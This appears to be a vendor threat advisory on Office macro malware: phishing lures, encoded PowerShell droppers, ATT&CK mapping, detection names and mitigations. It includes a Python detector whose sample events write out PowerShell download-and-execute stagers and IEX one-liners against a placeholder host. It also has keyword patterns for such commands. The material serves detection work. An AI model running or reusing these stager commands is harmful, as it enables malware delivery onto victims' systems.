A macro is a set of commands that automates a task inside an application. Threat actors took advantage of this and built macro malware: documents that abuse the VBA (Visual Basic for Applications) scripting in Microsoft Office macros to deliver other malware. These are usually delivered through phishing emails that lure the recipient into opening the attached document. When the file is opened, Office shows a security warning bar and the document body instructs the recipient to click "Enable Content". Once that is done, the macro runs and the recipient's system is infected.
Once enabled, the malicious macro typically launches a base64-encoded PowerShell command (the form powershell.exe accepts through its -EncodedCommand switch) that downloads a file into %UserProfile% or %Temp%. The downloaded file is then executed shortly afterwards.
- Delivers other malware payloads
- Uses macros
- Steals system information: computer name, system locale, operating system (OS) version and running processes
- Compromises system security, with backdoor capabilities that execute malicious commands
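The download-and-execute chain described above (an Office application spawning powershell.exe with a base64-encoded command that stages a file under %Temp% or %UserProfile% and runs it) is what a detection engineer would want to catch in process-creation telemetry. The following is an added illustration written for this page, not code from the original page or from Trend Micro: it decodes the -EncodedCommand argument (UTF-16LE wrapped in base64) and scores each event for the parent/child relationship, download, staging-path and execution indicators. The event field names, the sample events and the example.invalid URLs are constructed assumptions; map the fields to your own Sysmon or EDR schema.

```python
"""Flag Office -> PowerShell download-and-execute chains in process-creation telemetry.

Added illustration, not code from the original page. Field names, sample events
and URLs below are constructed assumptions; map them to your own Sysmon/EDR schema.
"""
import base64
import re
from dataclasses import dataclass

# Office hosts from which a malicious VBA macro typically spawns its stager.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Script hosts a macro commonly launches (the page's case is powershell.exe).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Longest alternative first so "-encodedcommand" is not cut short to "-e".
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer|net\.webclient")
EXECUTE_RE = re.compile(r"start-process|invoke-item|invoke-expression|\biex\b")
# Staging locations named on the page: %UserProfile% and %Temp%.
STAGING_MARKERS = ("$env:temp", "$env:userprofile", "%temp%", "%userprofile%", "\\appdata\\local\\temp")


@dataclass
class ProcessEvent:
    parent_image: str   # assumed field, e.g. Sysmon Event ID 1 ParentImage
    image: str          # assumed field, e.g. Sysmon Image
    command_line: str   # assumed field, e.g. Sysmon CommandLine


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the plaintext script behind -EncodedCommand/-enc/-e, or None if absent or undecodable."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: ProcessEvent) -> list:
    """Return the list of indicators observed for one process-creation event."""
    findings = []
    parent = event.parent_image.rsplit("\\", 1)[-1].lower()
    child = event.image.rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        findings.append(f"office parent {parent} spawned {child}")
    script = decode_encoded_command(event.command_line)
    if script is not None:
        findings.append("base64 -EncodedCommand decoded")
    else:
        script = event.command_line      # nothing encoded; inspect the raw command line
    low = script.lower()
    if DOWNLOAD_RE.search(low):
        findings.append("downloads remote content")
    if any(marker in low for marker in STAGING_MARKERS):
        findings.append("stages payload under %Temp%/%UserProfile%")
    if EXECUTE_RE.search(low):
        findings.append("executes downloaded content")
    return findings


def is_macro_dropper_chain(event: ProcessEvent) -> bool:
    """True when an Office app spawned a script host that downloads or executes something."""
    findings = analyze(event)
    return any(f.startswith("office parent") for f in findings) and any(
        f.startswith(("downloads", "executes")) for f in findings)


# Constructed sample: the behaviour the page attributes to the macro, as a stager script.
SAMPLE_SCRIPT = (
    "$u='http://example.invalid/invoice.exe';$p=$env:TEMP+'\\invoice.exe';"
    "(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process $p"
)
OFFICE_DIR = "C:\\Program Files\\Microsoft Office\\root\\Office16\\"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [  # constructed events, not real telemetry
    ProcessEvent(OFFICE_DIR + "WINWORD.EXE", PS,
                 "powershell.exe -NoP -W Hidden -Enc " + encode_command(SAMPLE_SCRIPT)),
    ProcessEvent("C:\\Windows\\explorer.exe", PS,
                 "powershell.exe -NoProfile -Command Get-Date"),
    ProcessEvent(OFFICE_DIR + "EXCEL.EXE", PS,
                 "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/stage.ps1')\""),
]

if __name__ == "__main__":
    for evt in SAMPLE_EVENTS:
        print(evt.parent_image.rsplit("\\", 1)[-1], "->", evt.image.rsplit("\\", 1)[-1],
              "SUSPICIOUS" if is_macro_dropper_chain(evt) else "ok", analyze(evt))
```

The decode step matters more than the keyword list: a command line that only shows `-Enc <blob>` hides every download and staging-path indicator until the blob is decoded, which is why the `T1027` obfuscation row appears in the ATT&CK mapping further down. The third sample event (in-memory `IEX` of a downloaded script) is flagged as well, even though it never touches %Temp%, because the Office-parent plus download-or-execute combination is the stable part of the chain.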
Sample spam (invoice attachment)
Sample document - "Enable Content" lure (MS Word and MS Excel)
MITRE ATT&CK Matrix
|Activity|Tactic|Technique|
|---|---|---|
|Malware arrives as an email attachment|Initial Access|T1566.001 Phishing: Spearphishing Attachment|
|Victim is lured into opening the attachment|Execution|T1204.002 User Execution: Malicious File|
|The attached document contains obfuscated macros that hide the URLs hosting the malware|Defense Evasion|T1027 Obfuscated Files or Information|
|The macro-enabled document downloads and executes the payload through a PowerShell command|Execution|T1059.005 Command and Scripting Interpreter: Visual Basic; T1059.001 Command and Scripting Interpreter: PowerShell|
|Solution Modules|Solution Available|Pattern Branch|Release Date|Detection/Policy/Rules|
|---|---|---|---|---|
|Email Protection|Yes|AS Pattern 5630|August 28, 2020|-|
|URL Protection|Yes|In the Cloud|-|-|
|Advanced Threat Scan Engine (ATSE)|Yes|16.191.00|August 28, 2020|-|
|Predictive Learning (TrendX)|Yes|In the Cloud|-|Downloader.VBA.TRX.XXVBAF01FF009|
|File detection (VSAPI)|Yes|ENT OPR 16.191.00|August 28, 2020|Trojan.W97M.EMOTET.TIOIBEKL|
|Behavioral Monitoring (AEGIS)|Yes|TMTD OPR 2163|August 27, 2020|4560T|
Additional Threat Information Reference:
- Digital Guardian: What is Macro Malware?
- Trend Micro Blog: Macro Malware - Here's what you need to know in 2016
- BlackBerry ThreatVector Blog: Cylance Threat Alert: Donoff and Dridex
- Keep the macro security settings in Microsoft Word and Excel enabled. The default setting blocks macros from untrusted sources and shows the security warning; the policy that blocks macros in Office files downloaded from the Internet removes the "Enable Content" option for such files altogether, so the lure in the document has nothing to click.
- Be extremely cautious about enabling macros. If there is any doubt about the authenticity of an email urging you to open a Word or Excel document, forward the message to a member of the IT staff instead of enabling content.
- If you continuously receive macro-bearing attachments from spam campaigns, use IMSVA's macro scanning to inspect or block them at the mail gateway.